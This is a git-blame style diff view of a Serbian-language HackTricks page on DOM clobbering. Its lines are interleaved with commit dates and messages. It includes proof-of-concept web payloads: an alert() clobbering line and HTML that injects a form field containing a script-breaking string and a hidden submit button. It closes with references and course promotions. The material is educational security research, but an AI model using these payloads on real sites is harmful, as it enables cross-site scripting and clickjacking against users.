										
										
											2024-02-06 03:10:27 +00:00
+								alert(document.getElementById('cdnDomain').innerText); // Clobbered
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								## Clobbering Forms
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Moguće je dodati **nove unose unutar forme** jednostavno tako što ćete **navesti `form` atribut** unutar nekih oznaka. Možete to koristiti da **dodate nove vrednosti unutar forme** i čak dodate novi **dugme** za **slanje** (clickjacking ili zloupotreba nekog `.click()` JS koda):
-												GITBOOK-3790: No subject

											
										
										
											2023-02-20 09:58:12 +00:00
 								{% code overflow="wrap" %}
 								```html
 								<!--Add a new attribute and a new button to send-->
 								<textarea form=id-other-form name=info>
 								";alert(1);//
 								</textarea>
 								<button form=id-other-form type="submit" formaction="/edit" formmethod="post">
 								Click to send!
 								</button>
 								```
 								{% endcode %}
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								* Za više atributa forme u [**dugmetu proverite ovo**](https://www.w3schools.com/tags/tag\_button.asp)**.**
-												GITBOOK-3790: No subject

											
										
										
											2023-02-20 09:58:12 +00:00
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								## Reference
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
 								* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								* [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								* Heyes, Gareth. JavaScript za hakere: Naučite da razmišljate kao haker.
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								{% hint style="success" %}
 								Naučite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Naučite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								<details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								<summary>Podržite HackTricks</summary>
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
 								* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
 								</details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								{% endhint %}